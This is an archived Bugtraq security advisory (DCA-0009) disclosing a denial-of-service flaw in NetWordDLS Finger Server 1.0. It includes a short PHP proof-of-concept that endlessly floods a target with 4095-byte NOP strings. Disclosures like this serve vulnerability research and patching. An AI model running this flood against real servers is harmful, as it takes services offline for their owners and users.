[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[DCA-0009] - NetWordDLS Finger Server Denial of Service

To: bugtraq@xxxxxxxxxxxxxxxxx, dclabs@xxxxxxxxxxxxx
Subject: [DCA-0009] - NetWordDLS Finger Server Denial of Service
From: Ewerson Guimarães (Crash) - Dclabs <crash@xxxxxxxxxxxxx>
Date: Mon, 2 Aug 2010 18:03:55 -0300

[DCA-0009 - NetWordDLS Finger Server Denial of Service]

[Software]
- NetWordDLS Finger Server

[Vendor Product Description]
- A windows server application that reports back to users the machine
name and the current logged on user

[Bug Description]
- Server does not validate the input size leading to a Denial Of
Service flaw while sending more than 4095 characters to it.

[History]
- Advisory sent to vendor on 06/20/2010.
- No vendor response
- Advisory publised on 08/01/2010

[Impact]
- Low

[Affected Version]
- Finger Server 1.0
- Prior versions may also be vulnerable

[Vendor Reply]


[Codes]

<?php
require_once 'PEAR.php';
require_once 'Net/Socket.php';
require_once 'Net/Finger.php';
$server = $argv[1];
while (1==1) {
$data = Net_Finger::query( $server, $a = str_repeat("\x90",4095)) ;
echo $data ;
}
?>

----------------------------------------------------------------------------------------

[Credits]
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs Security Team
www.dclabs.com.br

[Greetz]
ipax and all DcLabs members.

Prev by Date: [DCA-0003] Simple Web Server DoS
Next by Date: Re: [R7-0035] VxWorks Authentication Library Weak Password Hashing
Previous by thread: [DCA-0003] Simple Web Server DoS
Next by thread: [SECURITY] [DSA 2085-1] New lftp packages fix file overwrite vulnerability
Index(es):
- Date
- Thread